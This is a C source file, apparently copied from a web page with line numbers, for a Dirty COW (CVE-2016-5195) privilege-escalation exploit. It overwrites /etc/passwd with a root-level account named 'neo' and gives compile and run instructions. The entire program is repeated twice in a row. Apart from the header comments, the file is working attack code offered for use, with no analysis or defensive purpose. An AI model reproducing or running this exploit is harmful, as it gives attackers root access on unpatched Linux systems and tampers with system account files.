//// This exploit uses the pokemon exploit of the dirtycow vulnerability// a

1. //
2. // This exploit uses the pokemon exploit of the dirtycow vulnerability
3. // as a base and automatically generates a new passwd line.
4. // The user will be prompted for the new password when the binary is run.
5. // The original /etc/passwd file is then backed up to /tmp/passwd.bak
6. // and overwrites the root account with the generated line.
7. // After running the exploit you should be able to login with the newly
8. // created user.
9. //
10. // To use this exploit modify the user values according to your needs.
11. // The default is "neo".
12. //
13. // Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
14. // https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
15. //
16. // Compile with:
17. // gcc -pthread dirty.c -o dirty -lcrypt
18. //
19. // Then run the newly create binary by either doing:
20. // "./dirty" or "./dirty my-new-password"
21. //
22. // Afterwards, you can either "su neo" or "ssh neo@..."
23. //
24. // DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
25. // mv /tmp/passwd.bak /etc/passwd
26. //
27. // Exploit adopted by Christian "neo" Mehlmauer
28. // https://neo.at
29. //
30.  
31. #include <fcntl.h>
32. #include <pthread.h>
33. #include <string.h>
34. #include <stdio.h>
35. #include <stdint.h>
36. #include <sys/mman.h>
37. #include <sys/types.h>
38. #include <sys/stat.h>
39. #include <sys/wait.h>
40. #include <sys/ptrace.h>
41. #include <stdlib.h>
42. #include <unistd.h>
43. #include <crypt.h>
44.  
45. const char *filename = "/etc/passwd";
46. const char *backup_filename = "/tmp/passwd.bak";
47. const char *salt = "neo";
48.  
49. int f;
50. void *map;
51. pid_t pid;
52. pthread_t pth;
53. struct stat st;
54.  
55. struct Userinfo {
56. char *username;
57. char *hash;
58. int user_id;
59. int group_id;
60. char *info;
61. char *home_dir;
62. char *shell;
63. };
64.  
65. char *generate_password_hash(char *plaintext_pw) {
66. return crypt(plaintext_pw, salt);
67. }
68.  
69. char *generate_passwd_line(struct Userinfo u) {
70. const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
71. int size = snprintf(NULL, 0, format, u.username, u.hash,
72. u.user_id, u.group_id, u.info, u.home_dir, u.shell);
73. char *ret = malloc(size + 1);
74. sprintf(ret, format, u.username, u.hash, u.user_id,
75. u.group_id, u.info, u.home_dir, u.shell);
76. return ret;
77. }
78.  
79. void *madviseThread(void *arg) {
80. int i, c = 0;
81. for(i = 0; i < 200000000; i++) {
82. c += madvise(map, 100, MADV_DONTNEED);
83. }
84. printf("madvise %d\n\n", c);
85. }
86.  
87. int copy_file(const char *from, const char *to) {
88. // check if target file already exists
89. if(access(to, F_OK) != -1) {
90. printf("File %s already exists! Please delete it and run again\n",
91. to);
92. return -1;
93. }
94.  
95. char ch;
96. FILE *source, *target;
97.  
98. source = fopen(from, "r");
99. if(source == NULL) {
100. return -1;
101. }
102. target = fopen(to, "w");
103. if(target == NULL) {
104. fclose(source);
105. return -1;
106. }
107.  
108. while((ch = fgetc(source)) != EOF) {
109. fputc(ch, target);
110. }
111.  
112. printf("%s successfully backed up to %s\n",
113. from, to);
114.  
115. fclose(source);
116. fclose(target);
117.  
118. return 0;
119. }
120.  
121. int main(int argc, char *argv[])
122. {
123. // backup file
124. int ret = copy_file(filename, backup_filename);
125. if (ret != 0) {
126. exit(ret);
127. }
128.  
129. struct Userinfo user;
130. // set values, change as needed
131. user.username = "neo";
132. user.user_id = 0;
133. user.group_id = 0;
134. user.info = "pwned";
135. user.home_dir = "/root";
136. user.shell = "/bin/bash";
137.  
138. char *plaintext_pw;
139.  
140. if (argc >= 2) {
141. plaintext_pw = argv[1];
142. printf("Please enter the new password: %s\n", plaintext_pw);
143. } else {
144. plaintext_pw = getpass("Please enter the new password: ");
145. }
146.  
147. user.hash = generate_password_hash(plaintext_pw);
148. char *complete_passwd_line = generate_passwd_line(user);
149. printf("Complete line:\n%s\n", complete_passwd_line);
150.  
151. f = open(filename, O_RDONLY);
152. fstat(f, &st);
153. map = mmap(NULL,
154. st.st_size + sizeof(long),
155. PROT_READ,
156. MAP_PRIVATE,
157. f,
158. 0);
159. printf("mmap: %lx\n",(unsigned long)map);
160. pid = fork();
161. if(pid) {
162. waitpid(pid, NULL, 0);
163. int u, i, o, c = 0;
164. int l=strlen(complete_passwd_line);
165. for(i = 0; i < 10000/l; i++) {
166. for(o = 0; o < l; o++) {
167. for(u = 0; u < 10000; u++) {
168. c += ptrace(PTRACE_POKETEXT,
169. pid,
170. map + o,
171. *((long*)(complete_passwd_line + o)));
172. }
173. }
174. }
175. printf("ptrace %d\n",c);
176. }
177. else {
178. pthread_create(&pth,
179. NULL,
180. madviseThread,
181. NULL);
182. ptrace(PTRACE_TRACEME);
183. kill(getpid(), SIGSTOP);
184. pthread_join(pth,NULL);
185. }
186.  
187. printf("Done! Check %s to see if the new user was created\n", filename);
188. printf("You can log in with username %s and password %s.\n\n",
189. user.username, plaintext_pw);
190. printf("\nDON'T FORGET TO RESTORE %s FROM %s !!!\n\n",
191. filename, backup_filename);
192. return 0;
193. }
194. //
195. // This exploit uses the pokemon exploit of the dirtycow vulnerability
196. // as a base and automatically generates a new passwd line.
197. // The user will be prompted for the new password when the binary is run.
198. // The original /etc/passwd file is then backed up to /tmp/passwd.bak
199. // and overwrites the root account with the generated line.
200. // After running the exploit you should be able to login with the newly
201. // created user.
202. //
203. // To use this exploit modify the user values according to your needs.
204. // The default is "neo".
205. //
206. // Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
207. // https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
208. //
209. // Compile with:
210. // gcc -pthread dirty.c -o dirty -lcrypt
211. //
212. // Then run the newly create binary by either doing:
213. // "./dirty" or "./dirty my-new-password"
214. //
215. // Afterwards, you can either "su neo" or "ssh neo@..."
216. //
217. // DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
218. // mv /tmp/passwd.bak /etc/passwd
219. //
220. // Exploit adopted by Christian "neo" Mehlmauer
221. // https://neo.at
222. //
223.  
224. #include <fcntl.h>
225. #include <pthread.h>
226. #include <string.h>
227. #include <stdio.h>
228. #include <stdint.h>
229. #include <sys/mman.h>
230. #include <sys/types.h>
231. #include <sys/stat.h>
232. #include <sys/wait.h>
233. #include <sys/ptrace.h>
234. #include <stdlib.h>
235. #include <unistd.h>
236. #include <crypt.h>
237.  
238. const char *filename = "/etc/passwd";
239. const char *backup_filename = "/tmp/passwd.bak";
240. const char *salt = "neo";
241.  
242. int f;
243. void *map;
244. pid_t pid;
245. pthread_t pth;
246. struct stat st;
247.  
248. struct Userinfo {
249. char *username;
250. char *hash;
251. int user_id;
252. int group_id;
253. char *info;
254. char *home_dir;
255. char *shell;
256. };
257.  
258. char *generate_password_hash(char *plaintext_pw) {
259. return crypt(plaintext_pw, salt);
260. }
261.  
262. char *generate_passwd_line(struct Userinfo u) {
263. const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
264. int size = snprintf(NULL, 0, format, u.username, u.hash,
265. u.user_id, u.group_id, u.info, u.home_dir, u.shell);
266. char *ret = malloc(size + 1);
267. sprintf(ret, format, u.username, u.hash, u.user_id,
268. u.group_id, u.info, u.home_dir, u.shell);
269. return ret;
270. }
271.  
272. void *madviseThread(void *arg) {
273. int i, c = 0;
274. for(i = 0; i < 200000000; i++) {
275. c += madvise(map, 100, MADV_DONTNEED);
276. }
277. printf("madvise %d\n\n", c);
278. }
279.  
280. int copy_file(const char *from, const char *to) {
281. // check if target file already exists
282. if(access(to, F_OK) != -1) {
283. printf("File %s already exists! Please delete it and run again\n",
284. to);
285. return -1;
286. }
287.  
288. char ch;
289. FILE *source, *target;
290.  
291. source = fopen(from, "r");
292. if(source == NULL) {
293. return -1;
294. }
295. target = fopen(to, "w");
296. if(target == NULL) {
297. fclose(source);
298. return -1;
299. }
300.  
301. while((ch = fgetc(source)) != EOF) {
302. fputc(ch, target);
303. }
304.  
305. printf("%s successfully backed up to %s\n",
306. from, to);
307.  
308. fclose(source);
309. fclose(target);
310.  
311. return 0;
312. }
313.  
314. int main(int argc, char *argv[])
315. {
316. // backup file
317. int ret = copy_file(filename, backup_filename);
318. if (ret != 0) {
319. exit(ret);
320. }
321.  
322. struct Userinfo user;
323. // set values, change as needed
324. user.username = "neo";
325. user.user_id = 0;
326. user.group_id = 0;
327. user.info = "pwned";
328. user.home_dir = "/root";
329. user.shell = "/bin/bash";
330.  
331. char *plaintext_pw;
332.  
333. if (argc >= 2) {
334. plaintext_pw = argv[1];
335. printf("Please enter the new password: %s\n", plaintext_pw);
336. } else {
337. plaintext_pw = getpass("Please enter the new password: ");
338. }
339.  
340. user.hash = generate_password_hash(plaintext_pw);
341. char *complete_passwd_line = generate_passwd_line(user);
342. printf("Complete line:\n%s\n", complete_passwd_line);
343.  
344. f = open(filename, O_RDONLY);
345. fstat(f, &st);
346. map = mmap(NULL,
347. st.st_size + sizeof(long),
348. PROT_READ,
349. MAP_PRIVATE,
350. f,
351. 0);
352. printf("mmap: %lx\n",(unsigned long)map);
353. pid = fork();
354. if(pid) {
355. waitpid(pid, NULL, 0);
356. int u, i, o, c = 0;
357. int l=strlen(complete_passwd_line);
358. for(i = 0; i < 10000/l; i++) {
359. for(o = 0; o < l; o++) {
360. for(u = 0; u < 10000; u++) {
361. c += ptrace(PTRACE_POKETEXT,
362. pid,
363. map + o,
364. *((long*)(complete_passwd_line + o)));
365. }
366. }
367. }
368. printf("ptrace %d\n",c);
369. }
370. else {
371. pthread_create(&pth,
372. NULL,
373. madviseThread,
374. NULL);
375. ptrace(PTRACE_TRACEME);
376. kill(getpid(), SIGSTOP);
377. pthread_join(pth,NULL);
378. }
379.  
380. printf("Done! Check %s to see if the new user was created\n", filename);
381. printf("You can log in with username %s and password %s.\n\n",
382. user.username, plaintext_pw);
383. printf("\nDON'T FORGET TO RESTORE %s FROM %s !!!\n\n",
384. filename, backup_filename);
385. return 0;
386. }